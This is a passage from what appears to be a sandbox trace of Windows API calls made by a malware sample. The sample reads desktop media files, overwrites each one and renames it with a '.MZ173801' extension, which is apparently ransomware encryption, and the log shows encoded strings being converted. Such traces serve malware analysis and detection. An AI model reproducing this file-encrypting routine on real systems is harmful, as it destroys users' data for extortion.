lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.435] GetCurrentThreadId () returned 0x1358 [0124.435] GetCurrentThreadId () returned 0x1358 [0124.435] GetCurrentThreadId () returned 0x1358 [0124.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.435] GetCurrentThreadId () returned 0x1358 [0124.436] GetCurrentThreadId () returned 0x1358 [0124.436] GetCurrentThreadId () returned 0x1358 [0124.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\jxZ9.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\jxz9.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.436] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.436] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.436] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x185b8 [0124.436] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.436] ReadFile (in: hFile=0x414, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x185b8, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f6e4*=0x185b8, lpOverlapped=0x0) returned 1 [0124.437] CloseHandle (hObject=0x414) returned 1 [0124.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\jxZ9.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\jxz9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.440] WriteFile (in: hFile=0x414, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x185b8, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f6f0*=0x185b8, lpOverlapped=0x0) returned 1 [0124.442] CloseHandle (hObject=0x414) returned 1 [0124.443] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\jxZ9.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\jxz9.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\jxZ9.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\jxz9.mp3.mz173801")) returned 1 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] GetCurrentThreadId () returned 0x1358 [0124.443] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1abb9f0, ftCreationTime.dwHighDateTime=0x1d5e9e8, ftLastAccessTime.dwLowDateTime=0x4a9fa360, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x4a9fa360, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0x17ae2, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kplNa-lUk W _j.avi", cAlternateFileName="KPLNA-~1.AVI")) returned 1 [0124.443] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.443] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\kplNa-lUk W _j.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\kplna-luk w _j.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1abb9f0, ftCreationTime.dwHighDateTime=0x1d5e9e8, ftLastAccessTime.dwLowDateTime=0x4a9fa360, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x4a9fa360, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0x17ae2)) returned 1 [0124.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.444] GetCurrentThreadId () returned 0x1358 [0124.444] GetCurrentThreadId () returned 0x1358 [0124.444] GetCurrentThreadId () returned 0x1358 [0124.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.446] GetCurrentThreadId () returned 0x1358 [0124.446] GetCurrentThreadId () returned 0x1358 [0124.446] GetCurrentThreadId () returned 0x1358 [0124.446] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\kplNa-lUk W _j.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\kplna-luk w _j.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.446] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.446] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.446] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x17ae2 [0124.446] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.446] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17ae2, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x17ae2, lpOverlapped=0x0) returned 1 [0124.447] CloseHandle (hObject=0x414) returned 1 [0124.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\kplNa-lUk W _j.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\kplna-luk w _j.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.450] WriteFile (in: hFile=0x414, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17ae2, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x17ae2, lpOverlapped=0x0) returned 1 [0124.452] CloseHandle (hObject=0x414) returned 1 [0124.453] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\kplNa-lUk W _j.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\kplna-luk w _j.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\kplNa-lUk W _j.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\kplna-luk w _j.avi.mz173801")) returned 1 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] GetCurrentThreadId () returned 0x1358 [0124.453] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x451ae90, ftCreationTime.dwHighDateTime=0x1d5eae5, ftLastAccessTime.dwLowDateTime=0x869d6160, ftLastAccessTime.dwHighDateTime=0x1d5e4cc, ftLastWriteTime.dwLowDateTime=0x869d6160, ftLastWriteTime.dwHighDateTime=0x1d5e4cc, nFileSizeHigh=0x0, nFileSizeLow=0x16cb3, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="w WakBZH3I.pps", cAlternateFileName="WWAKBZ~1.PPS")) returned 1 [0124.453] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.453] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.453] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\w WakBZH3I.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\w wakbzh3i.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, 